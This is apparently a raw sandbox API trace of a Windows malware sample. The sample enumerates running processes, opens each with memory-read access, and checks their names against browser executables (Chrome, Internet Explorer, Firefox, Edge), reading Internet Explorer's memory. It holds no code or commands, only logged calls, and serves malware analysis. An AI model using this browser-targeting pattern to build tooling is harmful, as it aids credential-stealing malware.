	[0252.279] ReadProcessMemory (in: hProcess=0xa550, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.279] ReadProcessMemory (in: hProcess=0xa550, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.279] ReadProcessMemory (in: hProcess=0xa550, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.279] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0252.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa554
	[0252.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.280] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0252.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.280] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0252.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.281] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0252.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.281] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.281] NtQueryInformationProcess (in: ProcessHandle=0xa554, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0252.281] ReadProcessMemory (in: hProcess=0xa554, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0252.281] ReadProcessMemory (in: hProcess=0xa554, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0252.281] ReadProcessMemory (in: hProcess=0xa554, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0252.281] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0252.282] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa558
	[0252.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.282] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.283] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.283] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.283] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.284] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0252.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa55c
	[0252.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.285] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0252.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.285] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.285] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0252.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.286] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.286] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa560
	[0252.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.287] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.287] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.288] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.288] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.289] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.290] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.291] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa564
	[0252.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.292] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.292] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa568
	[0252.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.293] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.293] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.294] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.294] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.294] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa56c
	[0252.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.295] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.296] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.296] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.296] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa570
	[0252.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.297] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.298] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.298] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.298] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.298] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa574
	[0252.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.299] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.300] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.300] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.300] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.300] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa578
	[0252.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.301] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.302] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.302] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.302] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.302] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa57c
	[0252.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.303] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.304] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.304] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.304] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.304] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa580
	[0252.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.305] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.305] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.306] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.306] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.306] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa584
	[0252.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.307] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.307] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.308] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.308] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.308] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0252.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa588
	[0252.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.309] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0252.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.309] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.309] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0252.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.310] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.310] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0252.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa58c
	[0252.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.311] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.311] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.311] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.312] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.312] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0252.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa590
	[0252.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.313] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0252.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.313] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.313] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0252.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.314] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.314] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0252.314] CloseHandle (hObject=0x4fd0) returned 1
	[0252.314] Sleep (dwMilliseconds=0x64) 
	[0252.409] GetCurrentProcessId () returned 0x110
	[0252.409] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0252.414] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0252.416] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0252.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0252.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa594
	[0252.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.420] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.421] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.421] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.422] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.422] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa598
	[0252.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.423] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.423] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.423] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.424] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.424] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0252.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa59c
	[0252.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.425] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0252.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.425] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.426] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0252.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.426] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.426] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0252.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa5a0
	[0252.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.427] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0252.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.427] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.428] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0252.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.428] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.428] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0252.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa5a4
	[0252.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.429] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0252.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.429] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.430] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0252.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.430] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.430] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0252.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa5a8
	[0252.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.431] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0252.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.431] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.432] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0252.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
